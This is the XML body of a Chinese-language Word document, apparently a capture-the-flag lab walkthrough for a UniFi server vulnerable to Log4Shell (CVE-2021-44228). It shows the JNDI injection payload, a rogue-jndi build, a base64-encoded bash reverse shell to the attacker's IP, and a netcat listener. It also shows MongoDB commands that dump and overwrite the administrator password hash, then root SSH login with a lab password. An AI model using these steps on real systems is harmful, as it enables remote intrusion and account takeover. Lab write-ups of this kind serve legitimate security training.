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05FE" w14:textId="377339EB" w:rsidR="00B04B15" w:rsidRDefault="007E7C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">资产收集 </w:t>
      </w:r>
      <w:r>
        <w:t>10.129.13.192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81AB89" w14:textId="31E70C31" w:rsidR="007E7C45" w:rsidRDefault="007E7C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改host网页发现无法连接web服务  nmap扫描端口号等服务信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB8B8C" w14:textId="108F2CFD" w:rsidR="007E7C45" w:rsidRDefault="00A21068">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查到基础端口号</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>6789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>8443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD9E1B" w14:textId="46E24260" w:rsidR="00A21068" w:rsidRDefault="00A21068">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去到8</w:t>
      </w:r>
      <w:r>
        <w:t>080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口发现web网页是一个登录界面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71193B48" w14:textId="2C22D076" w:rsidR="00A21068" w:rsidRDefault="00A21068">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42DDF829" wp14:editId="58861D67">
            <wp:extent cx="4905375" cy="53911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2C0" w14:textId="3F70C732" w:rsidR="00A21068" w:rsidRDefault="00A21068">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过登录界面可以根据软件的版本号信息去Google有没有漏洞等信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64969F41" w14:textId="4C52CD2C" w:rsidR="00A21068" w:rsidRDefault="00A21068">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到一个已知漏洞C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">VE-2021-44228 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简要就是去执行log</w:t>
      </w:r>
      <w:r>
        <w:t>4j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的漏洞去创建一个反弹shell从而获取unified的权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95E5F5" w14:textId="54A3B1BB" w:rsidR="007F02EC" w:rsidRDefault="007F02EC"/>
    <w:p w14:paraId="26E648F3" w14:textId="2F48F887" w:rsidR="007F02EC" w:rsidRDefault="007F02EC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用burp抓一个post的包来对“remember”字段里的数值进行修改，发送到repeater如果有invalid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api说明可以注入。从</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00CE7308">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站可以查到详细的漏洞利用和复现手法。在其他版本的unifi中字段也可能存在username或是password中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D733055" w14:textId="6711E5D3" w:rsidR="007F02EC" w:rsidRDefault="007F02EC"/>
    <w:p w14:paraId="34AAAB4A" w14:textId="29AD852F" w:rsidR="007F02EC" w:rsidRDefault="007F02EC" w:rsidP="007F02EC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="CACAD2"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="CACAD2"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CACAD2"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="CACAD2"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里p</w:t>
      </w:r>
      <w:r>
        <w:t>ayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  $</w:t>
      </w:r>
      <w:r>
        <w:t>{jndi:ldap://{Tun0 IP Address}/whatever}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7B5DBD" w14:textId="684ADB96" w:rsidR="007F02EC" w:rsidRDefault="007F02EC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>NDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Java Naming and Directory Interface API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的缩写，call这个api程序可以定位资源和其他项目的类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD6F2B2" w14:textId="6B6776FE" w:rsidR="007F02EC" w:rsidRDefault="007F02EC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>DAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Lightweight Directory Access Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的缩写 </w:t>
      </w:r>
      <w:r w:rsidR="00785BE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">轻型目录访问协议 </w:t>
      </w:r>
      <w:r w:rsidR="00785BE0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00785BE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认port</w:t>
      </w:r>
      <w:r w:rsidR="00785BE0">
        <w:t xml:space="preserve"> 389 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4CE6E8" w14:textId="50433D34" w:rsidR="00785BE0" w:rsidRDefault="00785BE0"/>
    <w:p w14:paraId="3E8FD586" w14:textId="3FDC0A34" w:rsidR="00785BE0" w:rsidRDefault="00785BE0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过修改repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以用tcpdump或是wireshark抓包得知web服务器与本地的交互</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77804D05" w14:textId="1017BABF" w:rsidR="00785BE0" w:rsidRDefault="00785BE0"/>
    <w:p w14:paraId="7963E3A9" w14:textId="2382ED35" w:rsidR="00785BE0" w:rsidRDefault="00785BE0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行漏洞利用需要利用到 </w:t>
      </w:r>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pen-</w:t>
      </w:r>
      <w:r>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aven来构造payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A33D0E5" w14:textId="77777777" w:rsidR="00785BE0" w:rsidRDefault="00785BE0" w:rsidP="00785BE0"/>
    <w:p w14:paraId="075A18B9" w14:textId="77777777" w:rsidR="00785BE0" w:rsidRDefault="00785BE0" w:rsidP="00785BE0">
      <w:r>
        <w:t>Open-JDK 是 Java 开发工具包，用于构建 Java 应用程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD86A1" w14:textId="19B54987" w:rsidR="007F02EC" w:rsidRDefault="00785BE0">
      <w:r w:rsidRPr="00785BE0">
        <w:t>Maven 是一个集成开发环境 (IDE)，可用于创建结构化项目并将我们的项目编译成 jar 文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD27A69" w14:textId="57AEFB17" w:rsidR="00785BE0" w:rsidRDefault="00785BE0"/>
    <w:p w14:paraId="6EE37F3D" w14:textId="3B608A9E" w:rsidR="00785BE0" w:rsidRDefault="00785BE0">
      <w:r w:rsidRPr="00785BE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些应用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将帮助</w:t>
      </w:r>
      <w:r w:rsidRPr="00785BE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00785BE0">
        <w:t xml:space="preserve"> rogue-jndi Java 应用程序，该应用程序启动本地 LDAP 服务器并允许我们从易受攻击的服务器接收连接并执行恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2A439" w14:textId="64B03168" w:rsidR="0099587B" w:rsidRDefault="0099587B"/>
    <w:p w14:paraId="566447B5" w14:textId="58181A8B" w:rsidR="0099587B" w:rsidRDefault="0099587B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从github找到rogue-jndi的代码并用maven来构建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFC62D" w14:textId="77777777" w:rsidR="0099587B" w:rsidRDefault="0099587B" w:rsidP="0099587B">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="CACAD2"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="CACAD2"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CACAD2"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="CACAD2"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA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DD4A68"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://github.com/veracode-research/rogue-jndi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9A6E3A"/>
        </w:rPr>
        <w:t>&amp;&amp;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cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> rogue-jndi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9A6E3A"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> mvn package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B22C019" w14:textId="2FBF1BEA" w:rsidR="0099587B" w:rsidRDefault="0099587B"/>
    <w:p w14:paraId="519EBC8B" w14:textId="498CA742" w:rsidR="0099587B" w:rsidRDefault="0099587B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建出一个.jar的文件在 rogue-jndi/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">target/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下</w:t>
      </w:r>
      <w:r w:rsidR="00A86054">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再来构造一个经过base</w:t>
      </w:r>
      <w:r w:rsidR="00A86054">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00A86054">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密的payload防止传输加密问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F97973" w14:textId="04B50EE4" w:rsidR="00A86054" w:rsidRDefault="00A86054"/>
    <w:p w14:paraId="3108F9B3" w14:textId="6478EC44" w:rsidR="00A86054" w:rsidRDefault="00A86054">
      <w:r>
        <w:t>echo 'bash -c bash -i &gt;&amp;/dev/tcp/{Your IP Address}/{A port of your choice} 0&gt;&amp;1' | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF69145" w14:textId="412FEB78" w:rsidR="00A86054" w:rsidRDefault="00A86054"/>
    <w:p w14:paraId="6669278B" w14:textId="0D94C5CC" w:rsidR="00A86054" w:rsidRDefault="00A86054">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到一个一段加密的payload，把字段放入Rogue-jndi中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74E712" w14:textId="02E1D44E" w:rsidR="00A86054" w:rsidRDefault="00A86054">
      <w:r>
        <w:t>java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86054">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>BASE64 STRING HERE</w:t>
      </w:r>
      <w:r>
        <w:t>}| {base64,-d}|{bash,-i}" --hostname "{</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86054">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>YOUR TUN0 IP ADDRESS</w:t>
      </w:r>
      <w:r>
        <w:t>}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A6F88" w14:textId="3BB57AEB" w:rsidR="00A86054" w:rsidRDefault="00A86054"/>
    <w:p w14:paraId="3C3950EE" w14:textId="1A86C95B" w:rsidR="00A86054" w:rsidRDefault="00A86054">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地起一个nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-lvp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听口，重新在repeater发送P</w:t>
      </w:r>
      <w:r>
        <w:t>OST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE768F2" w14:textId="43DE4E7B" w:rsidR="00A86054" w:rsidRDefault="007E6D71">
      <w:r>
        <w:t>${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42759DD9" w14:textId="35356D84" w:rsidR="007E6D71" w:rsidRDefault="007E6D71"/>
    <w:p w14:paraId="5DB73911" w14:textId="5A0DEA65" w:rsidR="007E6D71" w:rsidRDefault="007E6D71">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地的4</w:t>
      </w:r>
      <w:r>
        <w:t>444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口会收到服务器发来的连接 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unifi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E6057F" w14:textId="2D6DCD0D" w:rsidR="007E6D71" w:rsidRDefault="007E6D71"/>
    <w:p w14:paraId="6860457C" w14:textId="63582784" w:rsidR="007E6D71" w:rsidRDefault="007E6D71">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级拿到的shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>script /dev/null -c bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在/</w:t>
      </w:r>
      <w:r>
        <w:t>home/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下找到用户拿到user</w:t>
      </w:r>
      <w:r>
        <w:t>.t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F0EAFD" w14:textId="0073C54E" w:rsidR="007E6D71" w:rsidRDefault="007E6D71"/>
    <w:p w14:paraId="7464E932" w14:textId="2ED0F438" w:rsidR="007E6D71" w:rsidRDefault="007E6D71">
      <w:r>
        <w:t xml:space="preserve">Ps aux | grep mongo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看所使用的MongoDB版本 端口等信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135DC1E" w14:textId="70F292F6" w:rsidR="007E6D71" w:rsidRDefault="007E6D71"/>
    <w:p w14:paraId="24FCEC38" w14:textId="19DEC526" w:rsidR="008617CE" w:rsidRDefault="008617CE">
      <w:r w:rsidRPr="008617CE">
        <w:t>mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123DF6E2" w14:textId="6E34F8CA" w:rsidR="008617CE" w:rsidRDefault="008617CE"/>
    <w:p w14:paraId="01396289" w14:textId="41C5EA8F" w:rsidR="008617CE" w:rsidRDefault="008617CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到administrator和xshadow加密的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C436D4" w14:textId="59FF4A49" w:rsidR="001B64AB" w:rsidRDefault="001B64AB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>mkpasswd -m sha-512 Password1234</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对新的密码进行hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1CAC8" w14:textId="585D2296" w:rsidR="001B64AB" w:rsidRDefault="001B64AB"/>
    <w:p w14:paraId="0804BCB9" w14:textId="74DA4CD8" w:rsidR="001B64AB" w:rsidRDefault="001B64AB">
      <w:r>
        <w:t>mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA_512 Hash Generated"}})'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C2E7DC" w14:textId="5145EA9E" w:rsidR="001B64AB" w:rsidRDefault="001B64AB"/>
    <w:p w14:paraId="02468771" w14:textId="701DB7FF" w:rsidR="001B64AB" w:rsidRDefault="001B64AB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将新的hash密码update到database中 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用administrator登陆网页成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F289E22" w14:textId="144758CB" w:rsidR="001B64AB" w:rsidRDefault="001B64AB"/>
    <w:p w14:paraId="1C8AD5C8" w14:textId="4B2046DD" w:rsidR="001B64AB" w:rsidRDefault="001B64AB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在网页setting中找到root的明文登陆口令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">NotACrackablePassword4U2022 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304B7902" w14:textId="570C2B82" w:rsidR="001B64AB" w:rsidRPr="0099587B" w:rsidRDefault="001B64AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root登陆拿到root权限找到root.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001B64AB" w:rsidRPr="009958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2"/>
    <w:rsid w:val="001B64AB"/>
    <w:rsid w:val="00555422"/>
    <w:rsid w:val="00785BE0"/>
    <w:rsid w:val="007E6D71"/>
    <w:rsid w:val="007E7C45"/>
    <w:rsid w:val="007F02EC"/>
    <w:rsid w:val="008617CE"/>
    <w:rsid w:val="0099587B"/>
    <w:rsid w:val="00A21068"/>
    <w:rsid w:val="00A86054"/>
    <w:rsid w:val="00B0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455B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CB52DAA9-A84E-477F-9052-FC4A069B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2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2E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7F02EC"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009958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rocketsecurity.com/resources/another-log4j-on-the-fire-unif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Shanwen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Xi Shanwen</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-27T18:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-28T01:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>